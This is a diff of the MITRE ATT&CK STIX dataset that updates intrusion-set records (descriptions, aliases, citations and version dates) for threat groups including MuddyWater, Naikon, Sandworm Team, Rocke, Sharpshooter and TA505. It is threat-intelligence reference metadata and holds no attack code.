+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -188494,19 +216603,22 @@
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
},
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ },
{
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
}
],
- "aliases": [
- "MuddyWater",
- "Seedworm",
- "TEMP.Zagros"
- ],
- "modified": "2020-03-30T02:33:35.792Z",
- "created": "2018-04-18T17:59:24.739Z",
"x_mitre_version": "2.2"
},
{
@@ -188552,14 +216664,6 @@
"x_mitre_version": "1.0"
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Naikon",
- "description": "[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea. (Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). (Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches. (Citation: Baumgartner Golovkin Naikon 2015)",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"external_id": "G0019",
@@ -188567,8 +216671,8 @@
"source_name": "mitre-attack"
},
{
- "description": "(Citation: Baumgartner Naikon 2015) (Citation: CameraShy) (Citation: Baumgartner Golovkin Naikon 2015)",
- "source_name": "Naikon"
+ "source_name": "Naikon",
+ "description": "(Citation: Baumgartner Naikon 2015)(Citation: CameraShy)(Citation: Baumgartner Golovkin Naikon 2015)"
},
{
"url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf",
@@ -188586,12 +216690,20 @@
"source_name": "Baumgartner Golovkin Naikon 2015"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "description": "[Naikon](https://attack.mitre.org/groups/G0019) is a threat group that has focused on targets around the South China Sea.(Citation: Baumgartner Naikon 2015) The group has been attributed to the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau(Military Unit Cover Designator 78020).(Citation: CameraShy) While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)",
+ "name": "Naikon",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--2a158b0a-7ef8-43cb-9985-bf34d1e12050",
+ "type": "intrusion-set",
"aliases": [
"Naikon"
],
- "modified": "2019-04-10T15:59:09.172Z",
+ "modified": "2020-07-03T21:48:57.725Z",
"created": "2017-05-31T21:31:54.232Z",
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -188672,9 +216784,9 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/"
},
{
- "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
+ "source_name": "Palo Alto OilRig Oct 2016",
"description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
- "source_name": "Palo Alto OilRig Oct 2016"
+ "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
},
{
"url": "https://pan-unit42.github.io/playbook_viewer/",
@@ -188703,13 +216815,13 @@
"HELIX KITTEN",
"APT34"
],
- "modified": "2020-03-28T21:29:21.460Z",
+ "modified": "2020-07-04T23:23:07.383Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
"Robert Falcone",
"Bryan Lee"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
"type": "intrusion-set",
@@ -188741,10 +216853,10 @@
],
"modified": "2020-03-30T19:12:41.915Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -188776,10 +216888,10 @@
],
"modified": "2020-03-19T23:58:28.015Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Ryan Becwar"
- ]
+ ],
+ "x_mitre_version": "1.2"
},
{
"type": "intrusion-set",
@@ -188837,6 +216949,10 @@
"source_name": "Patchwork",
"description": "(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
},
+ {
+ "source_name": "Hangover Group",
+ "description": "Patchwork and the Hangover Group have both been referenced as aliases for the threat group associated with Operation Monsoon.(Citation: PaloAlto Patchwork Mar 2018)(Citation: Unit 42 BackConfig May 2020)(Citation: Forcepoint Monsoon)"
+ },
{
"source_name": "Dropping Elephant",
"description": "(Citation: Symantec Patchwork) (Citation: Securelist Dropping Elephant) (Citation: PaloAlto Patchwork Mar 2018) (Citation: Volexity Patchwork June 2018)"
@@ -188851,7 +216967,7 @@
},
{
"source_name": "Operation Hangover",
- "description": "It is believed that the actors behind G0040 are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
+ "description": "It is believed that the actors behind Patchwork are the same actors behind Operation Hangover. (Citation: Forcepoint Monsoon) (Citation: Operation Hangover May 2013)"
},
{
"url": "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf",
@@ -188864,14 +216980,14 @@
"source_name": "Symantec Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
},
{
"url": "https://securelist.com/the-dropping-elephant-actor/75328/",
@@ -188879,14 +216995,19 @@
"source_name": "Securelist Dropping Elephant"
},
{
- "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/",
+ "source_name": "PaloAlto Patchwork Mar 2018",
"description": "Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.",
- "source_name": "PaloAlto Patchwork Mar 2018"
+ "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/"
},
{
- "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf",
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ },
+ {
+ "source_name": "Forcepoint Monsoon",
"description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.",
- "source_name": "Forcepoint Monsoon"
+ "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
},
{
"url": "http://enterprise-manage.norman.c.bitbit.net/resources/files/Unveiling_an_Indian_Cyberattack_Infrastructure.pdf",
@@ -188896,12 +217017,13 @@
],
"aliases": [
"Patchwork",
+ "Hangover Group",
"Dropping Elephant",
"Chinastrats",
"MONSOON",
"Operation Hangover"
],
- "modified": "2020-03-30T02:58:51.775Z",
+ "modified": "2020-07-03T22:15:24.309Z",
"created": "2017-05-31T21:32:07.145Z",
"x_mitre_version": "1.2"
},
@@ -189041,16 +217163,19 @@
"description": "(Citation: ESET RTM Feb 2017)"
},
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"aliases": [
"RTM"
],
- "modified": "2020-03-31T12:44:13.193Z",
+ "modified": "2020-05-12T22:16:44.650Z",
"created": "2017-05-31T21:32:10.206Z",
+ "x_mitre_contributors": [
+ "Oleg Skulkin, Group-IB"
+ ],
"x_mitre_version": "1.1"
},
{
@@ -189086,11 +217211,50 @@
"x_mitre_version": "1.2"
},
{
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0106",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0106"
+ },
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address \"rocke@live.cn\" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)",
+ "name": "Rocke",
+ "type": "intrusion-set",
+ "id": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "aliases": [
+ "Rocke"
+ ],
+ "modified": "2020-06-19T20:41:21.215Z",
+ "created": "2020-05-26T14:20:20.623Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:32:04.588Z",
+ "modified": "2020-07-04T01:56:59.493Z",
+ "aliases": [
+ "Sandworm Team",
+ "ELECTRUM",
+ "Telebots",
+ "IRON VIKING",
+ "BlackEnergy (Group)",
+ "Quedagh",
+ "VOODOO BEAR"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Sandworm Team",
- "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a Russian cyber espionage group that has operated since approximately 2009. The group likely consists of Russian pro-hacktivists. [Sandworm Team](https://attack.mitre.org/groups/G0034) targets mainly Ukrainian entities associated with energy, industrial control systems, SCADA, government, and media. [Sandworm Team](https://attack.mitre.org/groups/G0034) has been linked to the Ukrainian energy sector attack in late 2015.\n (Citation: iSIGHT Sandworm 2014) (Citation: CrowdStrike VOODOO BEAR)",
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive Russian threat group that has been attributed to Russian GRU Unit 74455 by the U.S. Department of Justice and U.K. National Cyber Security Centre. [Sandworm Team](https://attack.mitre.org/groups/G0034)'s most notable attacks include the 2015 and 2016 targeting of Ukrainian electrical companies and 2017's [NotPetya](https://attack.mitre.org/software/S0368) attacks. [Sandworm Team](https://attack.mitre.org/groups/G0034) has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -189104,6 +217268,22 @@
"source_name": "Sandworm Team",
"description": "(Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014) (Citation: InfoSecurity Sandworm Oct 2014)"
},
+ {
+ "source_name": "ELECTRUM",
+ "description": "(Citation: Dragos ELECTRUM)"
+ },
+ {
+ "source_name": "Telebots",
+ "description": "(Citation: NCSC Sandworm Feb 2020)"
+ },
+ {
+ "source_name": "IRON VIKING",
+ "description": "(Citation: Secureworks IRON VIKING )"
+ },
+ {
+ "source_name": "BlackEnergy (Group)",
+ "description": "(Citation: NCSC Sandworm Feb 2020)"
+ },
{
"source_name": "Quedagh",
"description": "Based on similarities between TTPs, malware, and targeting, Sandworm Team and Quedagh appear to refer to the same group. (Citation: iSIGHT Sandworm 2014) (Citation: F-Secure BlackEnergy 2014)"
@@ -189123,7 +217303,17 @@
"source_name": "CrowdStrike VOODOO BEAR"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "source_name": "USDOJ Sandworm Feb 2020",
+ "url": "https://www.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia/",
+ "description": "Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020."
+ },
+ {
+ "source_name": "NCSC Sandworm Feb 2020",
+ "url": "https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory",
+ "description": "NCSC. (2020, February 20). NCSC supports US advisory regarding GRU intrusion set Sandworm. Retrieved June 10, 2020."
+ },
+ {
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
},
@@ -189131,15 +217321,18 @@
"url": "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/",
"description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian \u2018Sandworm\u2019 Hackers. Retrieved October 6, 2017.",
"source_name": "InfoSecurity Sandworm Oct 2014"
+ },
+ {
+ "source_name": "Dragos ELECTRUM",
+ "url": "https://www.dragos.com/resource/electrum/",
+ "description": "Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020."
+ },
+ {
+ "source_name": "Secureworks IRON VIKING ",
+ "url": "https://www.secureworks.com/research/threat-profiles/iron-viking",
+ "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020."
}
],
- "aliases": [
- "Sandworm Team",
- "Quedagh",
- "VOODOO BEAR"
- ],
- "modified": "2019-03-25T16:55:26.051Z",
- "created": "2017-05-31T21:32:04.588Z",
"x_mitre_version": "1.0"
},
{
@@ -189174,6 +217367,34 @@
"created": "2017-05-31T21:32:00.677Z",
"x_mitre_version": "1.2"
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0104",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0104"
+ },
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "name": "Sharpshooter",
+ "description": "Operation [Sharpshooter](https://attack.mitre.org/groups/G0104) is the name of a cyber espionage campaign discovered in October 2018 targeting nuclear, defense, energy, and financial companies. Though overlaps between this adversary and [Lazarus Group](https://attack.mitre.org/groups/G0032) have been noted, definitive links have not been established.(Citation: McAfee Sharpshooter December 2018)",
+ "type": "intrusion-set",
+ "id": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "aliases": [
+ "Sharpshooter"
+ ],
+ "modified": "2020-06-30T03:08:44.808Z",
+ "created": "2020-05-14T21:40:31.089Z",
+ "x_mitre_version": "1.0"
+ },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -189200,19 +217421,19 @@
"source_name": "SecureList Silence Nov 2017"
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
"name": "Silence",
"type": "intrusion-set",
"id": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
"aliases": [
"Silence"
],
- "modified": "2020-03-30T19:17:42.266Z",
+ "modified": "2020-06-23T20:30:06.863Z",
"created": "2019-05-24T17:57:36.491Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Oleg Skulkin, Group-IB"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189230,9 +217451,9 @@
"description": "(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)"
},
{
- "source_name": "Unit42 SilverTerrier 2018",
+ "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018.",
"url": "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/unit42-silverterrier-rise-of-nigerian-business-email-compromise",
- "description": "Unit42. (2016). SILVERTERRIER: THE RISE OF NIGERIAN BUSINESS EMAIL COMPROMISE. Retrieved November 13, 2018."
+ "source_name": "Unit42 SilverTerrier 2018"
},
{
"description": "Renals, P., Conant, S. (2016). SILVERTERRIER: The Next Evolution in Nigerian Cybercrime. Retrieved November 13, 2018.",
@@ -189247,11 +217468,16 @@
"aliases": [
"SilverTerrier"
],
- "modified": "2020-03-30T19:18:51.266Z",
+ "modified": "2020-05-19T23:26:11.780Z",
"created": "2019-01-29T21:36:59.793Z",
"x_mitre_version": "1.1"
},
{
+ "created": "2019-07-18T20:47:50.050Z",
+ "modified": "2020-03-30T02:45:28.994Z",
+ "aliases": [
+ "Soft Cell"
+ ],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -189276,15 +217502,10 @@
"description": "Operation [Soft Cell](https://attack.mitre.org/groups/G0093) is a group that is reportedly affiliated with China and is likely state-sponsored. The group has operated since at least 2012 and has compromised high-profile telecommunications networks.(Citation: Cybereason Soft Cell June 2019)",
"type": "intrusion-set",
"id": "intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258",
- "aliases": [
- "Soft Cell"
- ],
- "modified": "2020-03-30T02:45:28.994Z",
- "created": "2019-07-18T20:47:50.050Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Cybereason Nocturnus, @nocturnus"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
"type": "intrusion-set",
@@ -189316,10 +217537,10 @@
],
"modified": "2020-03-30T02:46:16.483Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Alan Neville, @abnev"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"type": "intrusion-set",
@@ -189409,14 +217630,14 @@
"description": "ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. (Citation: Kaspersky ProjectSauron Blog) (Citation: Kaspersky ProjectSauron Full Report)"
},
{
- "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets",
+ "source_name": "Symantec Strider Blog",
"description": "Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.",
- "source_name": "Symantec Strider Blog"
+ "url": "http://www.symantec.com/connect/blogs/strider-cyberespionage-group-turns-eye-sauron-targets"
},
{
- "url": "https://securelist.com/faq-the-projectsauron-apt/75533/",
+ "source_name": "Kaspersky ProjectSauron Blog",
"description": "Kaspersky Lab's Global Research & Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.",
- "source_name": "Kaspersky ProjectSauron Blog"
+ "url": "https://securelist.com/faq-the-projectsauron-apt/75533/"
},
{
"source_name": "Kaspersky ProjectSauron Full Report",
@@ -189428,7 +217649,7 @@
"Strider",
"ProjectSauron"
],
- "modified": "2020-03-25T20:54:31.986Z",
+ "modified": "2020-06-29T01:43:19.374Z",
"created": "2017-05-31T21:32:07.541Z",
"x_mitre_version": "1.1"
},
@@ -189499,10 +217720,10 @@
],
"modified": "2020-03-30T19:22:32.962Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Valerii Marchuk, Cybersecurity Help s.r.o."
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
@@ -189515,6 +217736,10 @@
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/groups/G0092"
},
+ {
+ "source_name": "Hive0065",
+ "description": "(Citation: IBM TA505 April 2020)"
+ },
{
"description": "Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter",
@@ -189529,6 +217754,11 @@
"source_name": "Proofpoint TA505 Jan 2019",
"url": "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
"description": "Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
"object_marking_refs": [
@@ -189536,9 +217766,10 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"aliases": [
- "TA505"
+ "TA505",
+ "Hive0065"
],
- "modified": "2020-03-30T19:23:32.608Z",
+ "modified": "2020-06-23T20:39:02.606Z",
"created": "2019-05-28T15:54:17.213Z",
"x_mitre_version": "1.1"
},
@@ -189702,6 +217933,17 @@
"x_mitre_version": "1.1"
},
{
+ "created": "2017-05-31T21:31:58.518Z",
+ "modified": "2020-03-30T02:47:04.337Z",
+ "aliases": [
+ "Threat Group-3390",
+ "TG-3390",
+ "Emissary Panda",
+ "BRONZE UNION",
+ "APT27",
+ "Iron Tiger",
+ "LuckyMouse"
+ ],
"type": "intrusion-set",
"id": "intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189780,17 +218022,6 @@
"source_name": "Unit42 Emissary Panda May 2019"
}
],
- "aliases": [
- "Threat Group-3390",
- "TG-3390",
- "Emissary Panda",
- "BRONZE UNION",
- "APT27",
- "Iron Tiger",
- "LuckyMouse"
- ],
- "modified": "2020-03-30T02:47:04.337Z",
- "created": "2017-05-31T21:31:58.518Z",
"x_mitre_version": "1.3"
},
{
@@ -189826,10 +218057,10 @@
"x_mitre_version": "1.1"
},
{
- "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
- "type": "intrusion-set",
- "name": "Tropic Trooper",
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "G0081",
@@ -189840,30 +218071,45 @@
"source_name": "Tropic Trooper",
"description": "(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)"
},
+ {
+ "source_name": "Pirate Panda",
+ "description": "(Citation: Crowdstrike Pirate Panda April 2020)"
+ },
{
"source_name": "KeyBoy",
"description": "(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper Mar 2018)"
},
{
- "source_name": "TrendMicro Tropic Trooper Mar 2018",
+ "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
- "description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018."
+ "source_name": "TrendMicro Tropic Trooper Mar 2018"
},
{
- "source_name": "Unit 42 Tropic Trooper Nov 2016",
+ "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
- "description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018."
+ "source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
+ },
+ {
+ "source_name": "Crowdstrike Pirate Panda April 2020",
+ "url": "https://www.crowdstrike.com/blog/on-demand-webcast-crowdstrike-experts-on-covid-19-cybersecurity-challenges-and-recommendations/",
+ "description": "Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
